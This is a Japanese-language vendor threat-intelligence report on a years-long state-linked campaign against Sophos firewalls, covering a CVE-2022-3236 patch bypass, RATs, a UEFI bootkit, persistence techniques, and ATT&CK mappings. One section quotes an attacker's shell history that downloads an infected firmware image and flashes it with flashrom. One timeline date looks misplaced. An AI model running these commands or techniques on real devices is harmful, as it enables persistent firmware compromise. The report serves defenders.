攻撃者が完全なクリーンアップに失敗したデバイス上の tomcat ログを分析した結果、最初の侵入経路である Perl ベースのコンポーネントにおけるコマンドインジェクションの脆弱性が特定されました。この脆弱性は後に CVE-2022-3236 として指定されました。さらに分析を進めたところ、悪用の成功を指し示す、関連したテレメトリアーティファクトが見つかりました。この新たなセキュリティ侵害指標を調査したところ、Java ベースのトロイの木馬は標的とされたデバイスの一部にのみ展開されていたことが判明しました。すべてのデバイスに共通する主要な常駐化メソッドは、バックドア化された Perl コンポーネントでした (この攻撃で見つかったこのマルウェアとその他のマルウェアの詳細については、ソフォスの Covert Channels レポートに記載されています)。

2022 年 9 月 21 日: パッチ適用とアウトリーチ

ソフォスは CVE-2022-3236 の脆弱性を修正するホットフィックスの配信を開始し、この脆弱性の影響を受けたデバイスに配信された追加のマルウェアをすべて消去しました。

また、影響を受けたデバイスの所有者へのアウトリーチも開始しました。これまでに観測された活動と同様、標的は主にアジアに集中しており、特に東南アジアのある国の軍事・国家安全保障機関に顕著でした。同地域において、X-Ops は水道施設や発電施設を含む少数の重要インフラプロバイダーを標的としていることも確認しました。X-Ops は、これらの組織を標的とした情報収集の価値は低いと思われることから、攻撃を行ったグループは破壊的作戦の準備も行っていた可能性があるのではないかと考えています。

2022 年 9 月 23 日: 情報開示

ソフォスは CVE-2022-3236 エクスプロイトに関するアドバイザリを発表しました (リンク先: 英語)。

2022 年 9 月 22 日: IOC

ソフォスは追加の IOC を公表しました。

2022 年 6 月 1 日: Covert Channels の徹底的な悪用

X-Ops は、主にパッチが適用されていない EOL (サポート切れ) のレガシーデバイス上で CVE-2022-3236 をスキャンし、悪用する攻撃者を確認しました。2020 年に観測された TTP に回帰したのか、攻撃は無差別的で、後続の攻撃のためのオペレーショナルリレーの構築を目的としているようでした。攻撃はすべて、以前に観測された JAR ベースの常駐化手法を使用しており、その一貫性から自動化されたエクスプロイトだと考えられます。特定された C2 チャネルは香港を拠点とする ISP (IPTelecom Asia) に位置していました。

2023 年 6 月 13 日: アウトリーチ

ソフォスは、レガシー EOL デバイスを使用している企業に対し、サポート対象のファームウェアバージョンへのアップグレードを支援する取り組みを再開しました。

2023 年 11 月 27 日: パッチのバイパス

X-Ops の定期的な脅威ハンティングにより、CVE-2022-3236 に対するパッチを適用したデバイス上で不審な動きが確認されました。更に調査を進めたところ、悪意のある JAR ファイルの存在と　C2 IP (T1406) への接続が確認されました。C2 を探索したところ、CVE-2022-3236 の悪用に成功したことを示すロギングアーティファクトを持つ少数のデバイス (すべて CVE-2022-3236 のパッチが適用されていました) が特定されました。

2023 年 11 月 28 日: 例外的なバイパス

X-Ops のログ解析により、エクスプロイト時に発生した見慣れない例外が発見されました。ソースコード分析により、古いファームウェアバージョンを実行しているデバイスにおける CVE-2022-3236 パッチのバイパスが特定されました。攻撃者は不正な JSON を提供することで CVE-2022-3236 を緩和する追加の入力サニタイズ処理をスキップして、この例外をトリガーしていました。新しいファームウェアバージョンでは、追加のコード堅牢化対策がバイパスを阻止し、その有用性を制限しています。

同日、X-Ops はアジア外の政府パートナーから、同地域における脆弱なデバイスの活発なスキャンに関する情報を入手しました。以前に観測された CVE-2022-3236 の活動の大半は東南アジアの標的に集中していたため、注目に値します。

2023 年 11 月 29 日～ 12 月 11 日: バイパスへのパッチ

ソフォスのエンジニアリングチームは、上述のバイパスを修正するための段階的なホットフィックスをリリースしました。パッチの適用範囲を最大化するため、サポート対象外でありながら広く展開されている多くのファームウェアバージョンにもパッチがバックポートされました。

2023 年 12 月 11 日: アウトリーチと攻撃の帰属

ソフォスは、バイパスの影響を受けた少数の組織に対するアウトリーチを開始しました。X-Ops では、このバイパスの悪用は非常に限定的なことが確認されましたが、標的組織の特徴は注目に値するものでした。これまでの標的型攻撃とは異なり、被害者は主に東南アジアや南アジア地域ではない政府機関でした。エクスプロイト後に使用されたツールは特段珍しいものではありませんでしたが (zscan、fscan、Chisel など、既知のオープンソースツールの亜種が中心)、以前の攻撃で使用されたものとは大きく異なっていました。同様に、特定された C2 IP (すべて Cloudflare と RackNerd に属します) は、すべてアジア以外の国に位置していました (これ以前は、C2 IP の大半はアジアのホスティングプロバイダーに位置していました)。

これらの違いから、X-Ops はバイパスが別の攻撃グループによって使用されたことを確信しています。しかし、攻撃目標は以前と同様に中国の外交政策目標に沿ったものでした。たとえば、ある大使館は中国共産党政治局幹部を迎える直前にバイパスの標的となっていました。

水面下の活動

Covert Channels 攻撃の後、攻撃者は非常に少数の標的に対して既存のエクスプロイトを小規模に展開しました。攻撃者は攻撃を実行する際にも、自身のデバイスで調査や分析を行う際にも、オペレーショナルセキュリティを向上させることでソフォスのレーダーをかいくぐろうとしました。

これらの攻撃はしばしば、管理者がサポートされているファームウェアのバージョンを維持することにあまり熱心でなく、既知の脆弱性に対するパッチを適用していない、機密性の高いインストール環境を標的としています。

2022 年 7 月～ 2023 年 2 月: シンプルながらエレガントに

X-Ops は、ある原子力規制機関のインシデントを、その国の国家安全保障および諜報機関と協力して支援しました。

定期的な監視により、LAN 側の内部 Web サーバーから不審なバイナリをダウンロード (T1105) するデバイスが特定されました。X-Ops は影響を受けた組織に通知し、さらなる詳細を聴取しました。

X-Ops は国内の政府機関の協力を得てデバイスからマルウェアのサンプルを取得し、オープンソースのユーティリティとともに RAT を特定しました。この RAT はシンプルなバックコネクションシェルで、細工されたパケットをデバイスが受信すると起動 (T1205) します。以前 X-Ops が Cloud Snooper 攻撃および Personal Panda 攻撃で確認したのと同一の活動でした。バックコネクト C2 の IP アドレスは細工されたパケットにエンコードされており、ローカルに保存されていなかったため、アナリストは特定できませんでした。

配信されたオープンソースツールには Fast Reverse Proxy (FRP) と、強力な暗号化を組み込んだ安全な netcat クローンである sbd (T1090) が含まれていました。 X-Ops は、これらの攻撃と Volt Typhoon を直接関連付ける他の証拠を見つけることはできませんでしたが、CISA は後に、攻撃者である Volt Typhoon が FRP を使用していることを公表しました。

常駐化のため、攻撃者は正規のデバイスバイナリ「nasm」の名前を「nasmd」に変更し、nasm として RAT をドロップしました。システムは元々ブート時に「nasm」を実行するように設定されていました。この RAT は実行されると元の nasm バイナリをスポーンし、デバイスの機能への顕著な影響を回避していました。

さらに同様のマルウェアを探索したところ、原子力規制機関や軍の司令部施設、そして同国の首都空港で発見されたものと同様のペイロードを持つデバイスが見つかりました。

3 年前の CVE-2020-15069 攻撃で展開された TTP と同様、この攻撃はその単純さとスキルの高さで注目されました。また、デバイスの LAN 側から発生した可能性が高い攻撃を X-Ops がはっきり観測したのも、この攻撃が初めてでした。X-Ops はまた、時系列の分析により、攻撃者が有効な認証情報を使用してツールを展開している可能性が高いことを示すログエントリを発見し、RFC1918 IP アドレスからツールがダウンロード (T1078) されていることを確認しました。

2022 年 8 月 15 日: ルートキットからブートキットへ

あるベアメタルデバイスに新しいファイルが出現しました。このデバイスは、X-Ops が以前から疑わしいと判断し、X-Ops の標的型監視プログラムの一環として監視していたものです。コマンドラインの履歴から、デバイスのファームウェアに変更が加えられていることが判明しました。

ftpget -u admin -p password 10.10.10[.]110 ./flashrom ./flashrom

ftpget -u admin -p password 10.10.10[.]110 xg210-remove-dxe-guard-bds-infected.bin xg210-remove-dxe-guard-bds-infected.bin

chmod 777 flashrom { dd bs=392446464 skip=1 count=1; cat; } < /dev/sda > ./ext4_1_19.img

./flashrom -p internal -c "Opaque flash chip"

./flashrom -p internal -c "Opaque flash chip" -r xg210-read.bin

./flashrom -p internal -c "Opaque flash chip" -w xg210-remove-dxe-guard.bin

X-Ops は「/bin/XG210-rkloadtest.bin」ファイルのコピーを取得し、VectorEDK ベースの UEFI BIOS ブートキットの初期開発バージョンを特定しました。

ブートキットマルウェアを搭載したデバイスは、その名前からして広州市に本社を置くと思われる企業に登録されていました。一方、デバイス自体は成都を拠点とする企業が購入したもので、成都に位置する IP アドレスからテレメトリを送信していました。

X-Ops は追加の検出を配信しましたが、このブートキットの実環境での利用は観測されていません。

2023 年 3 月 23 日～ 4 月 19 日: サプライチェーンに続いて「GO」

X-Ops による定期的な脅威ハンティングにより、多数の戦略的産業をサポートする政府系テクノロジーサプライヤーが運用するデバイスにおいてメモリ上で実行されていた (ディスク上では削除されていました) 不審なファイルが発見されました。

X-Ops は、影響を受けたデバイスからサンプルを取得し、C2 ドメインを軸に、同じ組織が所有する別の影響を受けたデバイスを特定しました。さらに、影響を受けた組織に属するすべてのデバイスを調査したところ、1 件を除くすべてのデバイスが同じ組織 (残り 1 件は政府所有の電話会社) に属していることが判明しました。

回収されたサンプルは以下の通りです。

ポートマッピングツール LCX
「Pa55W0rd」をハードコードしたパスワードが設定された、オープンソースのポータブル SOCKS5 サーバーである Microsocks
系統が不明瞭な、斬新で完全な機能を備えた 64 ビット ELF バックドア。このバックドアは、デバイスに入力されたユーザーおよび管理者の認証情報を盗聴します。デバイスはドメインに接続されていたため、特権的な内部 Active Directory 認証情報の窃取 (T1649) が起きた可能性が高いと考えられます。
「Go-strip」と呼ばれる比較的無名のツールを使って難読化された Go バイナリ。このバイナリは DES で暗号化された構成を引数とし、実行すると指定された C2 サーバーに接続し、コマンド実行とファイル転送を行います。

この攻撃者が Go と Python を使用していることも、以前観察された活動と比してツールが近代化していることを示しています。

2023 年 5 月 17 日～ 19 日: ファームウェアのアップグレードを利用した常駐化

X-Ops は、定期的な脅威ハンティングの過程で、政府情報機関が所有する単一のデバイス上のリモートシェルを発見しました。

このリモートシェルは目立ったものではありませんでしたが、X-Ops はこれまで確認されていなかった常駐化手法を特定しました。攻撃者はオープンソースツール plthook を使用して、ファームウェアのアップグレードプロセスにフックを挿入 (T1037.002) していました。このフックは、デバイスがリブートする前、新しいファームウェアのために使用される一時的なパーティションにバックドアを書き込むことで、ファームウェアのアップグレードを通じて生き残ります (ただし、外付け USB ドライブを使用してファームウェアをフラッシュすることで、デバイスを修復できます)。

整合性チェックをバイパスするため、攻撃者はファームウェアの暗号署名を検証するバイナリもすり替えました (T1027.001)。

さらなる分析により、X-Ops はマルウェアの展開が有効な管理者認証情報を介して行われた (T1078) 可能性が高いと結論付けました。

また、X-Ops はファームウェア常駐型マルウェア (T1542.001) のコピーを含む、攻撃者が管理していると思われるデバイスを特定しました。この仮想デバイスは上海に位置しており、頻繁にファームウェアが変更されていました。特筆すべきは、最後に観測されたものは影響を受けた組織と同一の (古い) ファームウェアバージョンを実行していたことです。

2024 年 3 月: レガシーデバイスの ORB

X-Ops は、レガシー EOL デバイスが依然として CVE-2022-3236、CVE-2022-1040、CVE-2020-29574 に対して脆弱であり (特に Ivanti を用いた) 後続攻撃のオペレーションリレーとして使用されているという情報を得ました。影響を受けたデバイスは、ポート 58900 で Dropbear SSH サーバーを実行していることが確認され、攻撃者は検出と対応を妨げるために、テレメトリとリモートアップデートを全面的に無効化していました。

Sophos X-Ops は他社との連携、およびケースごとに追加で詳細な IOC を共有することを歓迎しています。pacific_rim@sophos.com までお問い合わせください。

詳細については、こちらのランディングページをご覧ください: Sophos Pacific Rim: Sophos defensive and counter-offensive operation with nation-state adversaries in China

謝辞

ソフォスは、本記事への貢献、または本記事で取り上げた調査への貢献に対し、ANSSI、Bugcrowd、CERT-In、CISA、Cisco Talos、Digital Shadows (現在は Reliaquest の一部)、FBI、Fortinet、JCDC、Mandiant、Microsoft、NCA、NHCTU、NCSC-NL、NCSC-UK、NSA、Palo Alto Networks、Recorded Future、Secureworks、Volexity の各組織に謝意を表します。

付録 I — MITRE ATT&CK の戦術と手法

本記事で言及したすべての攻撃者の戦術と手法については、表 1 から表 10 を参照してください。悪意のあるサイバー活動を MITRE ATT&CK フレームワークにマッピングする支援については、CISA および MITRE ATT&CK による MITRE ATT&CK マッピングのベストプラクティスおよび CISA の Decider Tool をご確認ください。

表 1.リソース開発

手法の名称	ID	使用例
インフラストラクチャの侵害: ネットワークデバイス	T1584.008	ソフォスのアナリストはシンクホールにおいて、攻撃者が消費者向けおよび SOHO 向けルーターにマッピングされた User-Agent 文字列とペイロードリクエスト、また Ragnarok ランサムウェアに関連する可能性のあるさまざまなリクエストを行っていたことを特定しました。

表 2.初期アクセス

手法の名称	ID	使用例
有効なアカウント	T1078	攻撃者は有効な管理者認証情報を使ってマルウェアを展開しました。
有効なアカウント: クラウドアカウント	T1078.004	攻撃者は、AWS SSM に関連する IAM 設定を悪用することで、オンプレミスのデバイスからクラウド資産に標的を切り替えました。
外部公開されているアプリケーションの悪用	T1190	攻撃者はインターネットに接続した Web ポータルを持つデバイスを標的にしました。
ドライブバイ攻撃	T1189	攻撃者は、Mac OS X と iOS 上で動作するように設計されたマルウェアと、WebAssembly (wasm) の脆弱性を悪用した IFRAME インジェクションコードを実装しました。

表 3.防衛回避

手法の名称	ID	使用例
なりすまし: 正規の名前や所在地を装う	T1036.055	攻撃者は SSH と SSHD を、ESET が Onderon と命名したマルウェアファミリに関連するバージョンに置き換えました。
難読化されたファイルまたは情報: バイナリパディング	T1027.001	攻撃者は整合性チェックをバイパスするため、ファームウェアの暗号署名を検証するバイナリをすり替えました。
ルートキット	T1014	攻撃者は Cloud Snooper という名前のルートキットを被害者のデバイスにインストールし、悪意のある C2 トラフィックを偽装するために使用しました。攻撃者はまた、libsophos.so ルートキットも実行していました。
なりすまし	T1036	攻撃者は、正規のデバイスバイナリの名前を変更し、その場所に RAT をドロップしました。また、この攻撃者はソフォス製品のファイル命名規則と動作を忠実に模倣した、カスタムメイドの完全な機能を備えたユーザーランドのルートキットを使用していました。
防御機能の無効化	T1562	この攻撃者は、例外をトリガーするために不正な JSON を提供し、脆弱性を緩和する追加の入力サニタイズをスキップすることで、彼らが悪用した脆弱性である CVE-2022-3236 の緩和策を回避しました。
防御機能の無効化: ツールの無効化または改変	T1562.001	攻撃者は、patch.sh というスクリプトをファイルシステムに書き込みました。このパッチは、自動的なホットフィックスの更新を無効にするフラグをデータベースに設定し、5 分ごとにこのコマンドを再実行しました。
防御機能の無効化: セキュリティ侵害指標のブロッキング	T1562.006	この攻撃者はデバイスの修復を妨害するため、ホットフィックスを受け入れる管理者設定を継続的に false に設定するスクリプトループを配信しました。
防御機能の無効化	T1562	攻撃者は不正な JSON を配信し、CVE-2022-3236 の緩和策である追加の入力サニタイズの例外をトリガーしました。
間接的なコマンド実行	T1202	攻撃者は Perl ベースのコンポーネントに存在するコマンドインジェクションの脆弱性　(CVE-2022-3236) を利用して、デバイスへの初期アクセスを行いました。
難読化されたファイルまたは情報	T1406	攻撃者は悪意のある JAR ファイルを使用し、CVE-2022-3236 のパッチが適用されたデバイス上の C2 IP に接続しました。

表 4.認証情報へのアクセス

手法の名称	ID	使用例
OS 認証情報のダンプ: DCSync	T1003.006	攻撃者は、LAN 側のドメインコントローラーから DCSync 認証情報ダンプを実行するため、スニッフィングされた認証情報を使用しました。
ブルートフォース: パスワード推測	T1110.001	攻撃者は脆弱な SSH 認証情報を介して、影響を受けた多数のデバイスへの初期アクセスを獲得しました。
認証証明書の窃取または偽造	T1649	攻撃者は、64 ビットの ELF バックドアを用いて権限を持つ内部 Active Directory 認証情報を窃取しました。
認証情報アクセスの悪用	T1212	攻撃者は CVE-2020-15069 を悪用し、アプライアンスに保存された認証情報を窃取するペイロードを配信しました。

表 5.探索

手法の名称	ID	使用例
ネットワークサービスの探索	T1046	この攻撃者は、標的の環境内の低権限コンピューターを用いてネットワークスキャンを実施しました。

表 6.ラテラルムーブメント

手法の名称	ID	使用例
リモートサービスの悪用	T1210	攻撃者は OS コンポーネントに存在する認証後のリモートコード実行の脆弱性を悪用しました。
リモートサービス: SSH	T1021.004	攻撃者は libsophos.so ライブラリを使い、LD_PRELOAD 環境変数を使ってシステムの SSHD にこのライブラリを注入しました。

表 7.コマンドアンドコントロール

手法の名称	ID	使用例
トラフィックシグナリング	T1205	攻撃者は細工したパケットをデバイスに送信し、デバイスが受信するとバックコネクトシェル RAT を起動させました。
トラフィックシグナリング: ポートノッキング	T1205.001	攻撃者は、SSHD プロセスに libsophos.so ライブラリを挿入し、細工された ICMP パケットを識別して応答できるようにしました。感染したデバイスがこのパケットを受信すると、攻撃者が選択した IP アドレスに SOCKs プロキシまたはリバースシェルバックコネクションを開きます。
トラフィックシグナリング: ソケットフィルター	T1205.002	攻撃者はステルス性の高いコマンドアンドコントロールでカーネルレベルのルートキットを配信しました。
プロキシ	T1090	攻撃者は、システムの SSHD に注入された libsophos.so ライブラリを使用して、感染したデバイスによって受信された際に SOCKS プロキシを展開する ICMP パケットを細工しました。別のインスタンスでは、攻撃者は高速リバースプロキシ (FRP) を配信しました。
プロキシ: マルチホッププロキシ	T1090.003	攻撃者は複数のプロキシを連鎖させ、攻撃の本当の発信元を難読化しました。
標的へのツールの展開	T1105	攻撃者は LAN 側の内部 Web サーバーから疑わしいバイナリをダウンロードしました。

表 8.実行

手法の名称	ID	使用例
コマンドとスクリプトインタープリタ: Unix シェル	T1059.004	攻撃者は Unix のシェルコマンドを悪用してコード実行を補助しました。
コマンドとスクリプトインタープリタ	T1059	攻撃者は SQLi の脆弱性 (CVE-2020-12271) を悪用すると同時に、コマンドインジェクションによる権限昇格を利用し、デバイスへの root アクセスを獲得して Asnarök トロイの木馬をインストールしました。また、別の事例では 2 つの悪意ある Linux シェルペイロード (patch.sh および IC.sh) も配信されました。さらに別の事例では、攻撃者はコマンドインジェクションの脆弱性を利用して 2 台のデバイス (法律事務所および IT サービス会社のもの) から米国に拠点を置くホスティング会社に属する IP アドレスへのリバースシェル接続を開きました。
クライアント実行のための攻撃	T1203	攻撃者は、コマンドインジェクションによる権限昇格と同時に、CVE 2020-12271 の脆弱性を悪用してデバイスへの root アクセスを獲得し、Asnarök トロイの木馬をインストールしました。別の事例では、攻撃者は CVE-2020-15069 を悪用して、デバイスの TStark クラスタに悪意のあるペイロードを展開しました。

表 9.常駐化

手法の名称	ID	使用例
サーバーソフトウェアコンポーネント: Web シェル	T1505.003	攻撃者は、WAN に面した Web ポータルを実行するデバイスに、悪意のある Web シェルを無差別に展開しました。
ホストソフトウェアバイナリの侵害	T1554	攻撃者は、デバイスの SSH および SSHD バイナリを Onderon (別名 bl0wsshd00r67p1) というマルウェアに置き換えました。
ブートまたはログオン初期化スクリプト: ログインフック	T1037.002	攻撃者は、ファームウェアのアップグレードプロセスにフックを挿入しました。このフックは、デバイスがリブートする前に新しいファームウェアのために使用される一時的なパーティションにバックドアを書き込むことで、ファームウェアのアップグレードを通じて生き残ります。
トラフィックシグナリング	T1205	攻撃者は、特別に細工されたパケットをデバイスが受信したときにトリガーする単純なバックコネクトシェルを配信しました。
外部リモートサービス	T1133	テレメトリは異なる場所にある複数の IP アドレスの間で切り替えられるため、攻撃者は TStark デバイスにアクセスするために断続的に VPN を使用していたようです。
アカウントの作成: ローカルアカウント	T1136.001	攻撃者は CVE-2020-29574 を悪用し、デバイス上に新しい管理者レベルのユーザーアカウント (cybersupport と名付けられていました) を作成しました。
実行フローの乗っ取り: Dylib の乗っ取り	T1574.004	攻撃者は、トロイの木馬化したクラスファイルを既存の Java アーカイブ (JAR) ファイル内に埋め込み、インターネットからアクセス可能な Java サーブレットにロードして、HTTP POST 経由で提供された他の AES 暗号化クラスファイルのダイナミックローダーとして動作させました。
ブートまたはログオン時の自動実行	T1547	攻撃者は、起動時にローカルシステム上のデバイスを一覧化し、コアモジュールを実行するルートキットモジュールを使用しました。

表 10.権限昇格

手法の名称	ID	使用例
有効なアカウント: クラウドアカウント	T1078.004	攻撃者は、オンプレミスのデバイスからクラウド資産にアクセスするため、AWS SSM に関連する過度に寛容な IAM 設定を悪用しました。

付録 II — 関連する業界のイベントと調査

この 5 年間の調査期間中、アナリストは関連する可能性のある調査やイベントを注意深く監視し、しばしばレポートの著者やチームと協力しました。さらなる調査を支援するため、追跡された関係者や、関連する可能性のあるグループや活動についての理解を助ける調査結果の一部をご紹介します。

このリストには、公開され次第リソースを追加していく予定です。

付録 III — ネットワークデバイス CVE のデータベース

本記事で紹介した、ソフォスを中心としたインシデントの分析を行う中で、複数のベンダーから大量のネットワークデバイスの脆弱性が公開され、多くの場合、関連する悪用が活発に行われていることも確認しました。世界的な脅威活動の規模を明らかにするため、また、コミュニティリソースとして役立つ可能性があるため、一部のベンダーが提供するネットワークデバイス (およびその他のエッジデバイス) に影響を及ぼす CVE のリストを公開しました。関連する公開調査が存在する場合は、実際の悪用や疑わしい攻撃者に関する詳細も記載しています。この情報は以下の表の通り、2024 年 10 月中旬現在、一般に入手可能な情報源および一般に入手可能な情報のベストエフォート探索より編集したものです。

要素	ソース
ベンダー	ベンダーの Web サイト
タイトル	NIST の National Vulnerability Database (https://nvd.nist.gov/)
CVE	NIST の National Vulnerability Database (https://nvd.nist.gov/)
CVSS	NIST の National Vulnerability Database (https://nvd.nist.gov/)
NVD 発行日	NIST の National Vulnerability Database (https://nvd.nist.gov/)
ベンダーアドバイザリの公開日	ベンダーの Web サイト
ランサムウェア攻撃での使用例	公開情報
KEV カタログへの追加日	CISA の Known Exploited Vulnerabilities Catalog (https://www.cisa.gov/known-exploited-vulnerabilities-catalog).
ベンダーのアドバイザリ	ベンダーの Web サイト
悪用が確認された日付	公開情報
攻撃者	公開情報
標的	公開情報

データには 24 組のベンダーが名を連ねています。このリストは、市場シェアと一般的な関心に基づいています。このリストは、Pacific Rim に関する他の記事で記録されている状況との関連性を示すものではありません。

Arcadyan Technology	F5	Palo Alto Networks
Barracuda Networks	FatPipe Networks	Pulse Secure [Ivanti]
Check Point Software	Fortinet	SonicWall
Cisco Systems	Juniper Networks	Sophos
Citrix Systems	MikroTik	Sumavision Technologies
DASAN Networks	Netgear	Tenda
D-Link Systems	Netis Systems	TP-Link
DrayTek	Oracle	Zyxel

ソフォスは、本記事への貢献や修正を歓迎します。状況が許す限り、本記事は今後更新される可能性があります。データは GitHub のリポジトリ https://github.com/sophoslabs/NetDeviceCVEs にて公開されています。

付録 IV — IOC

セキュリティ侵害の痕跡 (IOC) の表は、本記事で説明する個々の攻撃について、Sophos X-Ops GitHub にて公開されています。

注: これらは IOC の包括的なリストではありません。その代わりに、防御側が検知できると思われる、主にネットワーク上の重要な IOC に焦点を当てています。この活動の歴史的背景を考慮すると、どのような類似性があったとしても、タイムラインを注意深く考慮に入れ、本記事と照らし合わせる必要があります。

目次